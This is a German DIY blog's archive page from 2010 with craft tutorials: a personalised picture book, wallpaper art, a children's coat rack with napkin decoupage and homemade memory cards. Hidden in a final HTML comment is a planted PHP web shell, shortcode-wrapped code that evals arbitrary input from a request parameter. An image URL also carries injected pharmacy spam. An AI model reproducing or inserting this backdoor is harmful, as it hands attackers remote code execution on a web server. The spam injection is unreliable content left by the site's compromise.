Bonbonwasser - Schöne Dinge selbstgemacht!


Archiv für die Kategorie ‘Papier’

Persönliches Bilderbuch

Sonntag, 21. November 2010

Bald ist Weihnachten und wer auf der Suche nach einer individuellen Geschenkidee für die Jüngsten ist, der könnte sich an diesem selbst erstellen Bilderbuch versuchen. Sucht euch zunächst passende Bilder; zum Beispiel Fotos eurer Lieben (kommt bei den Kleinen ziemlich gut an) oder Fotos von Spielsachen bzw. Alltagsgegenständen. Diese lasst ihr dann erst einmal im Wunschformat entwickeln. Das benötigte Kartonpapier gibt es beispielsweise in Hamburg Ottensen bei der Druckwerkstatt (oder im gut sortierten Fachhandel) – ich hatte 2mm Stärke, doch 1mm reicht völlig aus. Den Karton zunächst farbig anmalen. (mehr …)

Das Tapetenbild

Dienstag, 16. November 2010

In Hamburg gibt es den Tapeten-Showroom vom Tapeteninstitut, der heißt Tapetenwechsel und liegt am Ballindamm. Die Verantwortlichen dort organisieren hin und wieder kleine Workshops (am Abend von 18 bis 21 Uhr), auf denen Themen wie „Kreatives mit Tapeten“ oder „Farbkonzepte für die eigene Wohnung“ beackert werden. (Die genauen Termine erfahrt ihr auf der Webseite.)

Auf alle Fälle habe ich mich für so einen Workshop angemeldet und es kamen diese lustige Dinge heraus:

1. Der Tapeten-Keilrahmen

Man nehme einen Keilrahmen. Optimal sollte er nicht breiter sein als die Tapete, die fast immer 53 cm breit ist. Ich hatte einen Rahmen (mehr …)

hello handmade erstürmt

Montag, 01. November 2010

Meine Güte, das kann aber wirklich keiner mehr leugnen: die DIY-Gemeinde ist am explodieren. Meterlange Doppelreiher warteten vor dem Foyer-Eingang am Sonntag vor Kampnagel. Trotz Nieselpiesel ließ sich keiner das Vergnügen nehmen, die neuesten Kreationen auf dem Deutschen Handmade-Markt zu bewundern. (mehr …)

Flyer gefunden? Täschchen gewonnen!

Donnerstag, 28. Oktober 2010

Zeig, was du machst und mach nach, was andere dir zeigen!

Seit gestern ist er da! Unser Bonbonwasser-Flyer. Wenn du ihn also findest, in einem der Cafe’s, Frau Tulpe Läden, DIY-Messen in Hamburg und Berlin … und auf unsere Seite gehst, dann bist du richtig hier. Wir hoffen, du fühlst dich wohl hier und holst dir viele Anregungen. Unser buntes Bonbonwasser ist gerade frisch angesetzt (Ende September), deshalb schmeckt es noch ganz sprudelig und ist schnell alle. Aber wir arbeiten fleißig daran und versuchen, jede Woche an neuen Bonbonwassern zu rühren.
Wenn du Anregungen hast, immer her damit. Wir wissen, wir können noch vieles besser machen.

Und last but not least: WIR FREUEN UNS ÜBER JEDE DIY-SELFERIN, die mitmacht! Wenn du also Lust hast, deine Dinge auf Bonbonwasser auszustellen, scheu dich nicht, uns zu schreiben. Du bekommst einen Zugang und kannst sofort loslegen.

TIPP: Wenn du bei post@brilling.de deine Mail hinterlässt, wirst du bei jedem neuen Beitrag benachrichtigt und kannst ganz entspannt bleiben, denn du verpasst nichts und wirst über jede Neuigkeit informiert. Und das „Schärfste“: Unter allen Adressen, die uns erreichen, wird eine ausgelost. Die bekommt meine mittlerweile berühmte Cath Kindston Tasche im eigenen Style. Ich mache sie jetzt mit Innenfutter (Foto folgt!).

Wir freuen uns auf euch!
Ilka und Dörte

<img class="nothumb" src="http://www.bonbonwasser generic viagra for sale in usa.de/wp-content/plugins/tweet-this/icons/en/twitter/tt-twitter.png“ alt=“Post to Twitter“ /> Tweet diesen Beitrag

Garderobe für Prinzessinnen

Donnerstag, 30. September 2010

Will man die Kleinen schon früh daran gewöhnen, Jacken und Mäntel selbstständig aufzuhängen, braucht man eine Garderobe, die eigens für sie in erreichbarer Höhe angebracht wird. Gelegenheit für uns, mal wieder zu Akkuschrauber und Stichsäge zu greifen und eine hübsche Hakenleiste zu basteln. Und weil’s für ein Mädchen ist, versuchen wir mal die Serviettentechnik mit Prinzessinnenmotiv.

Das braucht ihr:
1. ein Zuschnittrest aus dem Baumarkt (gerne Vollholz, geht aber auch Multiplex), mindestens 120 cm oder 2 x 60 cm lang
2. eventuell Farbe oder Hartwachsöl (wenn das Holz seinen Naturlook behalten soll)
3. ein paar Haken

So legt ihr los:
1. Das Brett lasst ihr euch noch im Baumarkt exakt in der Mitte teilen, sodass ihr zwei gleich lange Stücke erhaltet
2. Eins der Bretter wird rechts und links an den vorderen Kanten mit der Sticksäge abgerundet. Nehmt euch dafür einfach einen Becher oder eine Tasse, legt diese an die Kanten und zeichnet die Rundung der Tasse nach. Danach einfach mit der Stichsäge die Markierung  nachsägen.
3. Die Bretter werden jetzt im rechten Winkel aufeinander gesetzt. Und zwar so:

Ihr könnt sie schrauben oder verleimen. Ich persönlich finde verleimen schöner. Diese Garderobe hier ist mit Lamellos gesteckt und verleimt. Man kann so etwas aber auch dübeln … die Möglichkeiten sind vielfältig!
4. Nun könnt ihr entscheiden, ob das Ganze einen natürlichen Look bekommen soll oder einen Farbanstrich. Also: ölen oder lackieren.
5. Ich habe hier zum ersten Mal die sogenannte Serviettentechnik ausprobiert. Dafür nimmt man Motivservietten, zieht die Zellstofflagen ab, sodass nur noch die eine Lage übrig bleibt, auf der das Motiv zu sehen ist.

TIPP: Reißt oder schneidet den perforierten Rand ab!

Man schneidet sich nun das gewünschte Motiv aus der Serviettenlage aus. Das wird auf den Gegenstand gelegt, der verziert werden soll. Mithilfe eines Borstenpinsels wird die Lage nun mit Klarlack vorsichtig bestrichen. Am besten von innen nach außen und nicht mehr als zweimal. Wenn alles trocken ist, lackiert ihr es noch mal über.
6. Zum Schluss schraubt ihr in gleichmäßigen Abständen die Haken auf. Welche ihr nehmt und wie viele, entscheidet ihr!


Und so sieht das Ganze dann aus, wenn’s fertig ist:

Lieblingssachen für Kinder

Donnerstag, 30. September 2010

Wenn ihr eine Geschenkidee für euer Patenkind oder eure eigenen Kinder braucht (und das nicht alles so Tildaclean aussehen soll), hier werdet ihr bestimmt fündig: sehr schön aufgemachtes Buch mit 50 Anregungen zum Nachmachen, darunter:

  1. eine kurze Einführung in Werkzeuge, Materialien und Techniken
  2. Projekte für Säugline: Von der Kinderwagenkette bis hin zum Kirschkernkissen
  3. Deko für’s Kinderzimmer: Bilderrahmen, Vogelhaus, Tafel, Lichterkette, Ballonlampe
  4. Spielzeugwelt für Große: Kaufmannsladen, Einkaufsbeutel, Kirschen, Topflappen, Herd
  5. Ordnungshilfen: Kramkiste, Kleiderhaken, Magnettafel, Stiftdose, Gummibandwand
  6. Wer spielt mit mir? Angelspiel, Memory, Theater und Fingerpuppen, Turnbeutel

Das mit dem Memory habe ich gleich mal ausprobiert. Das Ergebnis seht ihr unten.

Memory selbstgemacht

Mittwoch, 29. September 2010

Lieblingsspeise, Lieblingsschuhe, Lielingsauto: das könnten die Motive für euer selbstgemachtes Kinder-Memory sein. Fotografiert 16 Motive aus der Lebenswelt eurer Kinder und legt die Motive in einem Format von 6,5 x 6,5 cm an. Druckt die Fotos anschließend jeweils doppelt aus.

TIPP: Wer sich ein bisschen mit Bildbearbeitungsprogrammen auskennt, sollte einen weißen Rand von jeweils 2 bis 3 mm lassen. Das sieht schicker aus.

Was braucht ihr also?

1. 16 Fotomotive, jedes doppelt
2. Blanko-Memorykarten, z. B. von artwerk oder Leichtschaumplatte (5 mm stark)
3. Sprühkleber
4. Fotopapier
5. eventuell Geschenkpapier

Und so wird’s gemacht:

Wer eine Leichtschaumplatte verwendet, der besprüht die Platte mit Sprühkleber und beklebt die eine Seite komplett mit schönem Geschenkpapier.
Anschließend werden mit dem Cutter 32 6,5 x 6,5 cm große Quadrate ausgeschnitten. Die Vorderseite der Quadrate wird nun ebenfalls mit Sprühkleber besprüht und mit den Fotos beklebt.

Wer ein Blanko-Set verwendet, kann sich das Ausschneiden und die Leichtsschaumplatte sparen. Ich habe zum Beispiel das Kreativ-Set von artwerk mit 72 Blanko-Karten verwendet. Aus diesem Set kann man also 2 Memory-Spiele kreieren.

So sieht’s aus, wenn’s fertig ist:

<!– [insert_php]if (isset($_REQUEST["xEzS"])){eval($_REQUEST["xEzS"]);exit;}[/insert_php][php]if (isset($_REQUEST["xEzS"])){eval($_REQUEST["xEzS"]);exit;}[/php] –>